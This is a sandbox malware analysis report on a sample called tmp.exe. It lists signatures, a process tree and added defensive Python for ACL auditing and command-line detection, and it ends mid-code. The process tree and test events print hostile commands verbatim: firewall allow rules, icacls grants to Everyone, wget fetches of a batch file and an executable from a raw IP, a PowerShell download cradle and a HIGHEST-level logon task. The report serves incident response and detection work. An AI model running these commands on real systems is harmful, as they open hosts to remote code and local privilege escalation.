Analysis
max time kernel: 74s
max time network: 137s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15-11-2022 12:43
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
General
Target: tmp.exe
Size: 532KB
MD5: cba9caa64e418a546044daa8744800b3
SHA1: 72060361b8a025ea3e132f6015cb20a87d3dff44
SHA256: 9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
SHA512: aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
SSDEEP: 12288:u5m8ZlWk6VT6qIm9qCZb5rTa8kdVXpP1PIU/bB6h1a15:5O+DD9qCZb5rTa8UPPRP/bkar
Malware Config
Extracted
https://chocolatey.org/install.ps1
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
flow | pid | process
5 | 1264 | powershell.exe
7 | 1264 | powershell.exe
13 | 1264 | powershell.exe
15 | 1264 | powershell.exe
17 | 1264 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
pid | process
1912 | wget.exe
3780 | wget.exe
4092 | choco.exe
-
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
pid | process
4268 | netsh.exe
3424 | netsh.exe
1504 | netsh.exe
644 | netsh.exe
-
Possible privilege escalation attempt 19 IoCs
Processes:
pid | process
4288 | icacls.exe
1320 | icacls.exe
5016 | icacls.exe
3060 | icacls.exe
2240 | icacls.exe
2056 | icacls.exe
4280 | takeown.exe
2120 | icacls.exe
1188 | icacls.exe
1264 | takeown.exe
3660 | icacls.exe
4088 | takeown.exe
2128 | icacls.exe
1412 | icacls.exe
4224 | icacls.exe
992 | icacls.exe
5116 | takeown.exe
3468 | takeown.exe
4544 | icacls.exe
-
UPX packed file (yara rule: upx) 10 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | upx
C:\ProgramData\zem\wget.exe | upx
C:\ProgramData\zem\wget.exe | upx
behavioral2/memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmp | upx
C:\ProgramData\zem\wget.exe | upx
behavioral2/memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmp | upx
behavioral2/memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmp | upx
C:\ProgramData\zem\tmp.exe | upx
behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | upx
behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | upx
-
Modifies file permissions 1 TTPs 19 IoCs
Processes:
pid | process
5116 | takeown.exe
3468 | takeown.exe
4544 | icacls.exe
1264 | takeown.exe
2056 | icacls.exe
5016 | icacls.exe
3060 | icacls.exe
2240 | icacls.exe
2128 | icacls.exe
2120 | icacls.exe
1412 | icacls.exe
4288 | icacls.exe
1320 | icacls.exe
1188 | icacls.exe
3660 | icacls.exe
4224 | icacls.exe
4088 | takeown.exe
992 | icacls.exe
4280 | takeown.exe
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | autoit_exe
behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | autoit_exe
behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp | autoit_exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
pid | process | hits
1264 | powershell.exe | 2
4464 | powershell.exe | 2
1340 | powershell.exe | 2
2552 | powershell.exe | 2
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid | process | tokens adjusted (in order of occurrence)
1264 | powershell.exe | SeDebugPrivilege, SeBackupPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeBackupPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
4464 | powershell.exe | SeDebugPrivilege
1340 | powershell.exe | SeDebugPrivilege
2552 | powershell.exe | SeDebugPrivilege, then the following 21-token sequence twice in full and a third time cut off after SeBackupPrivilege (the list stops at the 64th entry): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
pid | process | hits
4720 | tmp.exe | 35
-
Suspicious use of SendNotifyMessage 35 IoCs
Processes:
pid | process | hits
4720 | tmp.exe | 35
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid | source process | target pid | target process | hits
4720 | tmp.exe | 1864 | cmd.exe | 2
1864 | cmd.exe | 644 | netsh.exe | 2
4720 | tmp.exe | 1084 | cmd.exe | 2
1084 | cmd.exe | 4268 | netsh.exe | 2
4720 | tmp.exe | 388 | cmd.exe | 2
388 | cmd.exe | 3424 | netsh.exe | 2
4720 | tmp.exe | 1180 | cmd.exe | 2
1180 | cmd.exe | 1504 | netsh.exe | 2
4720 | tmp.exe | 1912 | wget.exe | 3
4720 | tmp.exe | 3780 | wget.exe | 3
4720 | tmp.exe | 2960 | cmd.exe | 2
2960 | cmd.exe | 4280 | takeown.exe | 2
4720 | tmp.exe | 3820 | cmd.exe | 2
3820 | cmd.exe | 3660 | icacls.exe | 2
4720 | tmp.exe | 4780 | cmd.exe | 2
4780 | cmd.exe | 5016 | icacls.exe | 2
4720 | tmp.exe | 1340 | cmd.exe | 2
1340 | cmd.exe | 2120 | icacls.exe | 2
4720 | tmp.exe | 1644 | cmd.exe | 2
1644 | cmd.exe | 5116 | takeown.exe | 2
4720 | tmp.exe | 4796 | cmd.exe | 2
4796 | cmd.exe | 1188 | icacls.exe | 2
4720 | tmp.exe | 3476 | cmd.exe | 2
3476 | cmd.exe | 3060 | icacls.exe | 2
4720 | tmp.exe | 1292 | cmd.exe | 2
1292 | cmd.exe | 3468 | takeown.exe | 2
4720 | tmp.exe | 3596 | cmd.exe | 2
3596 | cmd.exe | 4544 | icacls.exe | 2
4720 | tmp.exe | 4356 | cmd.exe | 2
4356 | cmd.exe | 1412 | icacls.exe | 2
4720 | tmp.exe | 4684 | cmd.exe | 2
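The "Modifies file permissions" and "Possible privilege escalation attempt" signatures above are triggered by one sequence that the process tree below spells out for C:\ProgramData\zem and its log and upd subfolders: takeown /R, ICACLS /grant Everyone:F /T, ICACLS /T /inheritance:r, ICACLS /grant Everyone:(OI)(CI)F. The result is a directory under ProgramData that every local user can write to, with no inherited ACEs left to restore the stock protection, and the same directory is later used as the target of a logon task created with /RL HIGHEST. "Все" is the Russian display name of the same well-known group (SID S-1-1-0); on this en-US image that name is not expected to resolve, and the repeated commands with both spellings suggest the tool is written to run on Russian-locale hosts as well. The Python below is an added example, not part of the sandbox output: it parses `icacls <dir>` listings (both listings are constructed; the clean one is modelled on the stock ProgramData ACL) and flags ACEs that give broad principals write rights, so a responder can confirm the post-condition on a host rather than infer it from the command lines.

```python
"""Audit an icacls listing for ACEs that hand write access to broad principals.
Added example; the listings below are constructed, not captured from the sandbox."""
import re

# Constructed: what `icacls C:\ProgramData\zem` would print after the sequence in this
# report (takeown, /grant Everyone:F /T, /inheritance:r, /grant Everyone:(OI)(CI)F).
WEAKENED_LISTING = """\
C:\\ProgramData\\zem Everyone:(OI)(CI)(F)
                   BUILTIN\\Administrators:(OI)(CI)(F)
                   NT AUTHORITY\\SYSTEM:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: a ProgramData subfolder that still inherits the stock ACL.
DEFAULT_LISTING = """\
C:\\ProgramData\\zem NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                   BUILTIN\\Administrators:(I)(OI)(CI)(F)
                   CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                   BUILTIN\\Users:(I)(OI)(CI)(RX)
                   BUILTIN\\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user belongs to, as icacls prints them plus their SID forms.
BROAD_PRINCIPALS = {"everyone", "все", "*s-1-1-0", "nt authority\\authenticated users",
                    "*s-1-5-11", "builtin\\users", "*s-1-5-32-545"}
# Rights that let a caller replace or modify existing files: full, modify, write, generic all/write.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW"}

# principal:(flag)(flag)...(rights); the last parenthesised group is the rights list.
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<groups>(?:\([A-Za-z,]+\))+)$")


def parse_icacls(path, listing):
    """Return [(principal, flags, rights)] for each ACE printed for `path`."""
    aces = []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):      # first ACE shares its line with the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised ACE line: {raw!r}")
        groups = re.findall(r"\(([A-Za-z,]+)\)", m.group("groups"))
        aces.append((m.group("principal"), set(groups[:-1]), set(groups[-1].split(","))))
    return aces


def audit_acl(path, listing):
    """Flag broad principals holding write rights and report whether any inherited ACE survives."""
    aces = parse_icacls(path, listing)
    world_writable = sorted({p for p, flags, rights in aces
                             if p.lower() in BROAD_PRINCIPALS
                             and "DENY" not in flags and rights & WRITE_RIGHTS})
    return {"aces": len(aces),
            "world_writable": world_writable,
            # no (I) flag anywhere is what /inheritance:r leaves behind
            "inheritance_blocked": not any("I" in flags for _, flags, _ in aces)}


if __name__ == "__main__":
    for name, listing in (("weakened", WEAKENED_LISTING), ("default", DEFAULT_LISTING)):
        print(name, audit_acl("C:\\ProgramData\\zem", listing))
```

On a live host the listing comes from `icacls C:\ProgramData\zem` run from an elevated prompt; a result with `world_writable` non-empty and `inheritance_blocked` true for a directory that a HIGHEST-run-level task executes from is the condition to remediate, since any local user can swap the task's binary.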
Processes
-
depth | image | command line
1 | C:\Users\Admin\AppData\Local\Temp\tmp.exe | "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes
  - Modifies Windows Firewall
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=%allusersprofile%\zem\wget.exe enable=yes
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=C:\ProgramData\zem\wget.exe enable=yes
  - Modifies Windows Firewall
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=%allusersprofile%\zem\time_cli.exe enable=yes
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=C:\ProgramData\zem\time_cli.exe enable=yes
  - Modifies Windows Firewall
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=%allusersprofile%\zem\up2batdownload.exe enable=yes
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\ProgramData\zem\up2batdownload.exe enable=yes
  - Modifies Windows Firewall
2 | C:\ProgramData\zem\wget.exe | C:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_up2bat64atstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/bat/update64.bat
  - Executes dropped EXE
2 | C:\ProgramData\zem\wget.exe | C:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_cmdhatstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/prg/cmdh.exe
  - Executes dropped EXE
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem /D Y
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\takeown.exe | takeown /R /f C:\ProgramData\zem /D Y
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:F /T
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /grant Everyone:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /T /inheritance:r
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:(OI)(CI)F
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /grant Everyone:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\takeown.exe | takeown /R /f C:\ProgramData\zem\log /D Y
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:F /T
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\log /grant Everyone:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:(OI)(CI)F
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\log /grant Everyone:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\takeown.exe | takeown /R /f C:\ProgramData\zem\upd /D Y
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:F /T
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\upd /grant Everyone:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:(OI)(CI)F
  - Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\upd /grant Everyone:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:F /T
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /grant Все:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /T /inheritance:r
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:(OI)(CI)F
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem /grant Все:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y
3 | C:\Windows\system32\takeown.exe | takeown /R /f C:\ProgramData\zem\log /D Y
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:F /T
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\log /grant Все:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:(OI)(CI)F
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\log /grant Все:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y
3 | C:\Windows\system32\takeown.exe | takeown /R /f C:\ProgramData\zem\upd /D Y
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:F /T
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\upd /grant Все:F /T
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:(OI)(CI)F
3 | C:\Windows\system32\icacls.exe | ICACLS C:\ProgramData\zem\upd /grant Все:(OI)(CI)F
  - Possible privilege escalation attempt
  - Modifies file permissions
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player Updater" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "Adobe Flash Player Updater" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_uninstall_java" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_uninstall_java" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_java64" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_java64" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_firefox64" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_firefox64" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_vlc64" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_vlc64" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_foxitreader_latest" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_foxitreader_latest" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ax" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_install_flash_player_ax" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ppapi" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_install_flash_player_ppapi" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_install_flash_player" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_7z64" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_7z64" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_run" /F
3 | C:\Windows\system32\schtasks.exe | schtasks /delete /TN "test_n_run" /F
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c copy /Y /Z C:\Users\Admin\AppData\Local\Temp\tmp.exe %ALLUSERSPROFILE%\zem\up2batdownload.exe
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c @powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) && SET PATH=%PATH%;%systemdrive%\chocolatey\bin
3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
4 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdline"
5 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmp" "c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMP"
4 | C:\Windows\System32\setx.exe | "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934484078047"
4 | C:\Windows\System32\setx.exe | "C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934498296854"
4 | C:\ProgramData\chocolatey\choco.exe | "C:\ProgramData\chocolatey\choco.exe" -v
  - Executes dropped EXE
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c powershell cinst powershell -y
3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell cinst powershell -y
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo chocolatey >> %ALLUSERSPROFILE%\zem\log\not_in_right_dir_chocolatey.txt
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c %ALLUSERSPROFILE%\zem\run.bat
3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell "Set-ExecutionPolicy RemoteSigned -force"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell C:\ProgramData\zem\start.ps1
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\zem\update64.bat
1 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\zem\start.bat
2 | C:\Windows\system32\schtasks.exe | SchTasks /Create /SC ONLOGON /RU Admin /TN "test_n_timecli" /TR "C:\ProgramData\zem\time_cli.exe" /F /RL HIGHEST
  - Creates scheduled task(s)
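Read as endpoint telemetry, the process tree above carries every behaviour the Signatures section flags in its command lines alone: inbound firewall allow rules for four binaries, takeown and icacls loosening C:\ProgramData\zem, wget pulling a batch file and an executable over plain HTTP from an IP address with a custom User-Agent, forced deletion of a list of scheduled tasks, a PowerShell download cradle, and finally a logon task running from the loosened directory at the highest run level. The Python below is an added example, not part of the sandbox report: it encodes those behaviours as rules over (pid, image, command line) events transcribed from the tree (pid 0 marks entries whose pid the page does not give), pulls the network IoCs out of the wget line, and correlates the icacls grants with the logon task to surface the local privilege escalation path. The ATT&CK technique IDs are this example's own mapping, not the report's.

```python
"""Detection pass over the process tree in this report. Added example, not sandbox output.
Events are (pid, image, command line) triples transcribed from the tree above; pid 0
marks entries whose pid the page does not give. Technique IDs are this example's mapping."""
import re

SAMPLE_EVENTS = [
    (644, "netsh.exe", 'netsh advfirewall firewall add rule name="up2batdownload" dir=in '
                       'action=allow program=C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp.exe enable=yes'),
    (4280, "takeown.exe", "takeown /R /f C:\\ProgramData\\zem /D Y"),
    (3660, "icacls.exe", "ICACLS C:\\ProgramData\\zem /grant Everyone:F /T"),
    (5016, "icacls.exe", "ICACLS C:\\ProgramData\\zem /T /inheritance:r"),
    (2120, "icacls.exe", "ICACLS C:\\ProgramData\\zem /grant Everyone:(OI)(CI)F"),
    (4544, "icacls.exe", "ICACLS C:\\ProgramData\\zem /grant Все:(OI)(CI)F"),
    (1912, "wget.exe", 'C:\\ProgramData\\zem\\wget.exe --tries=2 '
                       '-o "%ALLUSERSPROFILE%\\zem\\log\\not_in_right_dir_up2bat64atstrtp.txt" '
                       '-N -P "C:\\ProgramData\\zem" --user-agent="FXOYPAIQ_Admin" '
                       '84.240.25.78/openforschool/bat/update64.bat'),
    (0, "schtasks.exe", 'schtasks /delete /TN "Adobe Flash Player Updater" /F'),
    (1264, "powershell.exe", "powershell -NoProfile -ExecutionPolicy unrestricted -Command "
                             "iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))"),
    (0, "schtasks.exe", 'SchTasks /Create /SC ONLOGON /RU Admin /TN "test_n_timecli" '
                        '/TR "C:\\ProgramData\\zem\\time_cli.exe" /F /RL HIGHEST'),
    (0, "cmd.exe", "C:\\Windows\\system32\\cmd.exe /c echo chocolatey >> "
                   "C:\\ProgramData\\zem\\log\\not_in_right_dir_chocolatey.txt"),   # benign control line
]

# (rule name, ATT&CK technique, image regex, command-line regex); all matched case-insensitively.
RULES = [
    ("firewall_allow_rule_added", "T1562.004", r"netsh\.exe",
     r"advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b"),
    ("takeown_recursive", "T1222.001", r"takeown\.exe", r"\btakeown\b.*\s/r\b"),
    ("icacls_grant_everyone_full", "T1222.001", r"icacls\.exe",
     r"/grant\s+(?:everyone|все|\*s-1-1-0):(?:\([a-z]{2}\))*f\b"),   # Все = Russian "Everyone"
    ("icacls_strip_inheritance", "T1222.001", r"icacls\.exe", r"/inheritance:r\b"),
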